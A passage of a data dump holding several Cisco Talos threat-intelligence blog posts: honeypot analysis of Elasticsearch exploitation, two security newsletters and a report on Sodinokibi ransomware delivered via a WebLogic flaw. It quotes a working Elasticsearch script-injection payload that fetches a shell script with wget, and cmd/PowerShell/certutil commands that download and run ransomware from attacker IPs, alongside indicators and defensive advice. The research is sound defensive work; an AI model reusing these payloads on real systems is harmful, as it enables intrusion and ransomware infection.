\n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-01T16:16:02", "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "cvss3": {}, "published": "2019-02-26T10:56:00", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "modified": "2019-03-01T15:56:50", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-09T20:20:13", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jonathan Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nIf you haven\u2019t yet, there\u2019s still time to [register for this year\u2019s Talos Threat Research Summit](<https://www.ciscolive.com/us/learn/programs/talos-threat-research-summit.html>) \u2014 our second annual conference by defenders, for defenders. This year\u2019s Summit will take place on June 9 in San Diego \u2014 the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register! \n \nThis was a heavy week for vulnerability discovery. Snort rules are loaded up with [protections against a recent wave of attacks](<https://blog.snort.org/2019/05/snort-rule-update-for-may-7-2019.html>) centered around a critical Oracle WebLogic bug. We also discovered vulnerabilities in [SQLite](<https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-remote-code.html>) and [three different Jenkins plugins](<https://blog.talosintelligence.com/2019/05/jenkins-plugins-vulnerability-spotlight-may-19.html>). \n \nFinally, we also have our [weekly Threat Roundup](<https://blog.talosintelligence.com/2019/05/threat-roundup-0426-to-0503.html>), which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we\u2019ve seen (and blocked) over the past week. \n\n\n### Upcoming public engagements with Talos\n\n**Event:** [Copenhagen Cybercrime Conference](<https://www.cyberhagen.com/event/39cd5ea8-2155-4d38-8128-34b457dc0e98/websitePage:645d57e4-75eb-4769-b2c0-f201a0bfc6ce?5S%2CM3%2C39cd5ea8-2155-4d38-8128-34b457dc0e98=>)\n\n**Location:** Industriens Hus, Copenhagen, Denmark\n\n**Date:** May 29\n\n**Speaker:** Paul Rascagn\u00e8res\n\n**Synopsis:** Paul will give an overview of an espionage campaign targeting the Middle East that we called \u201cDNSpionage.\u201d First, he will go over the malware and its targets and then talk about the process the attackers took to direct DNSs. The talk will include a timeline of all events in this attack, including an alert from the U.S. Department of Homeland Security. \n \n\n\n**Event:** [Bsides London](<https://www.securitybsides.org.uk/>)\n\n**Location:** ILEC Conference Centre, London, England\n\n**Date:** June 5\n\n**Speaker:** Paul Rascagn\u00e8res\n\n**Synopsis:** Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it\u2019s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker. \n\n### Cyber Security Week in Review\n\n * * The city of Baltimore\u2019s online government operations were completely stalled this week [after a ransomware attack](<https://www.baltimoresun.com/news/maryland/politics/bs-md-20190508-story.html>). The city\u2019s IT director said the RobinHood malware forced the government to go \u201cmanual\u201d with many tasks. Emergency services have not been impacted.\n * A group of hackers [stole information](<https://arstechnica.com/information-technology/2019/05/hackers-breached-3-us-antivirus-companies-researchers-reveal/>) from three American antivirus companies. The group is offering source code and network access to the companies for $300,000. The companies affected have not been named yet but were recently contacted by the federal government to alert them of the breach.\n * Attackers [stole $41 million worth of Bitcoin](<https://www.reuters.com/article/us-crypto-currency-cyber-binance/hackers-steal-41-million-worth-of-bitcoin-from-binance-cryptocurrency-exchange-idUSKCN1SE0FK>) from cryptocurrency exchange Binance. A representative from Binance said hackers used a variety of techniques, \u201cincluding phishing, viruses and other attacks.\u201d\n * The tax services of Danish mega company Wolters Kluwer were [taken offline](<https://krebsonsecurity.com/2019/05/whats-behind-the-wolters-kluwer-tax-outage/>) this week as the result of a cyber attack. The outage specifically affected CCH, a cloud-based company, that caused \u201cnetwork and service interruptions.\u201d\n * WordPress\u2019 latest update includes a few [long-awaited security updates](<https://www.techradar.com/news/wordpress-revamped-with-new-security-features>). Each of the content management system\u2019s updates will now include digital signatures, and there is a new \u201cSite Health\u201d page for users.\n * Google\u2019s [latest security update](<https://www.androidheadlines.com/2019/05/google-pixel-may-2019-android-security-update.html>) fixed a number of vulnerabilities in the Android operating system, including several critical- and high-severity bugs. The most notable fix is for a vulnerability in Media framework that could \u201cenable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.\u201d\n * Cisco released [security updates](<https://www.bleepingcomputer.com/news/security/cisco-fixes-critical-vulnerability-in-elastic-services-controller/>) for a critical vulnerability in the Elastic Services Controller. An unauthenticated, remote attacker could exploit this flaw to obtain admin privileges. \n * Israel [bombed the cyber headquarters](<https://www.forbes.com/sites/kateoflahertyuk/2019/05/06/israel-retaliates-to-a-cyber-attack-with-immediate-physical-action-in-a-world-first/#7508e855f895>) of Hamas in retaliation for an alleged cyber attack. Military involvement, in this case, has brought up several questions surrounding how cyber warfare could begin intersecting with physical retaliation.\n * A power supplier on the West Coast was [hit with a cyberattack last week](<https://www.eenews.net/stories/1060281821>). The attack did not cause any loss of power for customers but did prevent visibility in some parts of the country. \n * Cyber firms are increasingly turning to [non-traditional sources of recruiting](<https://www.wsj.com/articles/cybersecurity-jobs-abound-no-experience-required-11557394201>) as the industry looks to fill a talent gap. Some companies are training researchers on the go, even if they do not have a traditional security degree.\n\n### Notable recent security issues\n\n**Title: **[Attacks using WebLogic bugs expand, evolve](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) \n**Description: **Attackers continue to spread malware by exploiting a critical vulnerability in Oracle WebLogic. The bug, identified as CVE-2019-2725, was disclosed and patched last week. However, as users have been slow to update, attackers are still able to exploit this vulnerability to deliver ransomware, specifically Gandcrab and XMRig. \n\n\n**Snort SIDs:** 50014 - 50025\n\n \n\n\n**Title: **[Cisco discloses 41 bugs, one of them critical](<https://www.sdxcentral.com/articles/news/cisco-issues-largest-single-day-security-vulnerabilities-in-at-least-12-months/2019/05/>) \n**Description: **Cisco released a security update for several of its products, including one critical bug in the SSH key management for the Nexus 9000 series Application Centric Infrastructure (ACI) mode switch software. An attacker could exploit this vulnerability by connecting to a machine via SSH, which could allow them to connect to the system with the same privileges as a root user. \n**Snort SIDs:** 49992 - 49996, 50006, 50007\n\n### Most prevalent malware files this week\n\n**SHA 256:** [3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/#/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5:** 47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename:** qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name:** Win.Trojan.Generic::in10.talos \n \n**SHA 256:** [15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b](<https://www.virustotal.com/#/file/15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b/details>) \n**MD5:** 799b30f47060ca05d80ece53866e01cc \n**Typical Filename:** 799b30f47060ca05d80ece53866e01cc.vir \n**Claimed Product:** N/A \n**Detection Name: **W32.Generic:Gen.21ij.1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/#/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **Tempmf582901854.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.AgentWDCR:Gen.21gn.1201 \n \n**SHA 256:** [7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510](<https://www.virustotal.com/#/file/7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510/details>) \n**MD5:** 4a50780ddb3db16ebab57b0ca42da0fb \n**Typical Filename: **xme64-2141.exe \n**Claimed Product:** N/A \n**Detection Name: **W32.7ACF71AFA8-95.SBX.TG \n \n**SHA 256:** [9d48f382ec11bd9b35488a2c2b878e5401c2be43f00bcbae30d1619e6e2bf0c1](<https://www.virustotal.com/#/file/9d48f382ec11bd9b35488a2c2b878e5401c2be43f00bcbae30d1619e6e2bf0c1/details>) \n**MD5:** dd46d0260a6cdf5625d468398bae1f60 \n**Typical Filename:** N/A \n**Claimed Product: **N/A \n**Detection Name: **Win.Dropper.Undefined::tpd \n\n\n \n\n\n", "cvss3": {}, "published": "2019-05-09T11:00:02", "type": "talosblog", "title": "Threat Source newsletter (May 9)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-09T11:00:02", "id": "TALOSBLOG:7A681329F7813E49DED3E928ED08D453", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/UnDh7UQFE9M/threat-source-may-9-19.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-01T20:19:50", "description": "_This blog was authored by [Pierre Cadieux](<https://twitter.com/pchobbit>), [Colin Grady](<https://twitter.com/ColinGrady>), [Jaeson Schultz](<https://twitter.com/jaesonschultz>) and [Matt Valites](<https://twitter.com/matthewvalites>)_ \n \nAttackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called \"Sodinokibi.\" Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>). This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least [April 17](<https://isc.sans.edu/forums/diary/Unpatched+Vulnerability+Alert+WebLogic+Zero+Day/24880/>). Cisco's [Incident Response (IR) team](<https://www.cisco.com/c/en/us/products/security/sas-incident-response.html>), along with Cisco Talos, are actively investigating these attacks and Sodinokibi. \n \n\n\n[](<https://1.bp.blogspot.com/-t1wvTOXYM88/XMhzOJSlmXI/AAAAAAAAArU/FsmHYMLu7AQSS-RIQINEePUnlqgPqY0xQCLcBGAs/s1600/image6.jpg>)\n\n \n \nInitial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. This was a trial to see whether the server was exploitable. \n \n\n\n[](<https://1.bp.blogspot.com/-dr0gPLkwXUA/XMhzTOvpdHI/AAAAAAAAArY/xF0IZnQxKngebF4N2qS-IoQywRG_5f9VACLcBGAs/s1600/image4.png>)\n\n_April 25, 2019 activity showing the initial activity preceding the ransomware deployment._ \n \n \nOn April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the AsyncResponderService of the Oracle WebLogic Server. \n \n\n\n[](<https://2.bp.blogspot.com/-LBiprLucWao/XMhzXoXTbeI/AAAAAAAAArc/A19jWXIN8MoqmAHkg7ZxuNIhJTXJkIRRQCLcBGAs/s1600/image3.jpg>)\n\n_Activity from April 26. The attackers are downloading the Sodinokibi ransomware._ \n \n \nHistorically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a [phishing domain](<https://www.phishtank.com/phish_detail.php?phish_id%3D6005605>), and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. \n \nCisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction \u2014 a PowerShell command to download a file called \"radm.exe\" from host 188.166.74[.]218, then save that file locally and execute it. \n \n\n \n \n cmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe&cmd.exe /c %TEMP%\\\\radm.exe \n \n\n \nIn addition to PowerShell, we also observed the attackers creatively passing the certutil utility to cmd to download a file: \n \n\n \n \n cmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe %TEMP%/radm.exe&cmd.exe /c %TEMP%\\\\radm.exe \n \n\n \nBesides \"radm.exe,\" researchers observed multiple file names in the PowerShell and certutil commands, including: \n \n\n\n> hxxp[:]//188.166.74[.]218/office.exe \nhxxp[:]//188.166.74[.]218/radm.exe \nhxxp[:]//188.166.74[.]218/untitled.exe \nhxxp[:]//45.55.211[.]79/.cache/untitled.exe\n\n \nOnce detonated in [Threat Grid](<https://panacea.threatgrid.com/mask/samples/fbb1cc7a40ef2254f31ee800a00a0a5d>), the sandbox identified this sample as potential ransomware. \n \n\n\n[](<https://3.bp.blogspot.com/-jFgwvg54THU/XMhzd3fe5LI/AAAAAAAAArk/UTe-kIHef6UZZY5yb2v-J0e7mZpQhDWRwCLcBGAs/s1600/image5.png>)\n\n \n \nThe website VirusTotal successfully detected the same binary hash on [43 out of 71 different engines](<https://www.virustotal.com/%23/file/0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d/detection>). \n \nBelow, we can see the malicious file \"untitled.exe\" using \"cmd.exe\" to execute the vssadmin.exe utility. This action is a common tactic of ransomware to prevent users from easily recovering their data. It attempts to delete default Windows backup mechanisms, otherwise known as \"shadow copies,\" to prevent recovery of the original files from these backups. \n \n\n\n[](<https://3.bp.blogspot.com/-23uDUCegltE/XMhzmi3-mXI/AAAAAAAAArs/Xtv5prwuva0Qr9ZPjyhK7i9Wh40JQgTNQCLcBGAs/s1600/image1.png>)\n\n \n \nThe ransom note, in this case, directs victims to either a .onion website on the Tor network or on the public web at the domain decryptor[.]top, registered on March 31 this year. With Sodinokibi, each encrypted system sees a distinct encrypted file extension. The ransom note filename also includes this extension as a prefix (ex. 88f2947s-HOW-TO-DECRYPT.txt). \n \n\n\n[](<https://2.bp.blogspot.com/-HNv7PGAPG5M/XMhzq_mdtBI/AAAAAAAAAr0/iQ6l7CSc1IwJGMedRkjCxX-4iQjHJn67ACLcBGAs/s1600/image2.jpg>)\n\n \n \n\n\n### The Gandcrab affiliate connection\n\n \nAfter finishing deploying Sodinokibi ransomware inside the victim's network, the attackers followed up with an additional CVE-2019-2725 exploit attempt approximately eight hours later. However, this time, the attackers chose to distribute Gandcrab v5.2. We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab. \n \n\n\n### Conclusion\n\n \nThis attack is notable because of the attackers' use of a zero-day exploit to distribute ransomware. Whereas [previously](<https://blog.talosintelligence.com/2016/03/samsam-ransomware.html>) we have witnessed ransomware attackers taking advantage of unpatched systems to install and laterally propagate ransomware, this zero-day exploitation method could work on otherwise fully-patched systems. \n \nThe victims in this ransomware attack were able to activate their Incident Response Retainer with Cisco IR Services, and they received immediate support and advice on managing the incident. Immediate actions taken likely prevented a more significant outage. \n \nDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725, and we recommend the following actions. Any number of layered controls could prevent or otherwise deter this type of attack, including: \n \n\n\n * Patch WebLogic as soon as possible against CVE-2019-2725.\n * Log and centrally collect web, application, and operating systems events.\n * Restrict the access of the account used to run the WebLogic process\n * Monitor for signs of compromise:\n * Egress network communications from data center systems.\n * Ransomware \"Canary\" files.\n * External HTTP POSTs to new URIs.\n * Web shells.\n * Unexpected activity of service/system accounts (WebLogic user).\n * Scan for, understand, and mitigate your vulnerability posture.\n * Restrict egress Data Center communications.\n * Segment the network for defense and monitoring.\n * Control URL access (in this case external access to \"/_async/*\" and \"/wls-wsat/*\").\n * Plan for Disaster Recovery, including maintaining and testing data backups and recovery.\n * Configure PowerShell to execute only signed scripts.\n \n \n \n\n\n### Indicators of Compromise (IoC)\n\n \n**Ransomware samples:** \n0fa207940ea53e2b54a2b769d8ab033a6b2c5e08c78bf4d7dade79849960b54d \n34dffdb04ca07b014cdaee857690f86e490050335291ccc84c94994fa91e0160 \n74bc2f9a81ad2cc609b7730dbabb146506f58244e5e655cbb42044913384a6ac \n95ac3903127b74f8e4d73d987f5e3736f5bdd909ba756260e187b6bf53fb1a05 \nfa2bccdb9db2583c2f9ff6a536e824f4311c9a8a9842505a0323f027b8b51451 \n \n**Distribution URLs:** \nhxxp://188.166.74[.]218/office.exe \nhxxp://188.166.74[.]218/radm.exe \nhxxp://188.166.74[.]218/untitled.exe \nhxxp://45.55.211[.]79/.cache/untitled.exe \n \n**Attacker IP:** \n130.61.54[.]136 \n \n**Attacker Domain:** \ndecryptor[.]top \n \n[](<https://4.bp.blogspot.com/-s2BzeGmzUMU/XMihm3CakTI/AAAAAAAAAsU/osy0RP3N9qMlbJLqYN1sSq7z5FQGtDemACLcBGAs/s1600/coverage.png>)\n\n", "cvss3": {}, "published": "2019-05-01T12:37:18", "type": "talosblog", "title": "Sodinokibi ransomware exploits WebLogic Server vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2019-05-01T12:37:18", "id": "TALOSBLOG:311242B8285F529AAB4833CDEBC9989C", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/OFcQbj3TV_Q/sodinokibi-ransomware-exploits-weblogic.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-02T18:19:08", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jonathan Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nIf you haven\u2019t yet, there\u2019s still time to [register for this year\u2019s Talos Threat Research Summit](<https://www.ciscolive.com/us/learn/programs/talos-threat-research-summit.html>) \u2014 our second annual conference by defenders, for defenders. This year\u2019s Summit will take place on June 9 in San Diego \u2014 the same day Cisco Live kicks off in the same city. We sold out last year, so hurry to register! \n \nThis week was stacked with original research. First up was the [Sodinokibi ransomware](<https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html>), which we saw being distributed via a zero-day vulnerability in Oracle WebLogic. Today, we also released our findings on a [new variant of Qakbot](<https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html>), which is more difficult to detect than older versions. \n \nFinally, we also have our [weekly Threat Roundup](<https://blog.talosintelligence.com/2019/04/threat-roundup-0419-to-0426.html>), which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we\u2019ve seen (and blocked) over the past week. \n\n\n### Upcoming public engagements with Talos\n\n**Event:** [Copenhagen Cybercrime 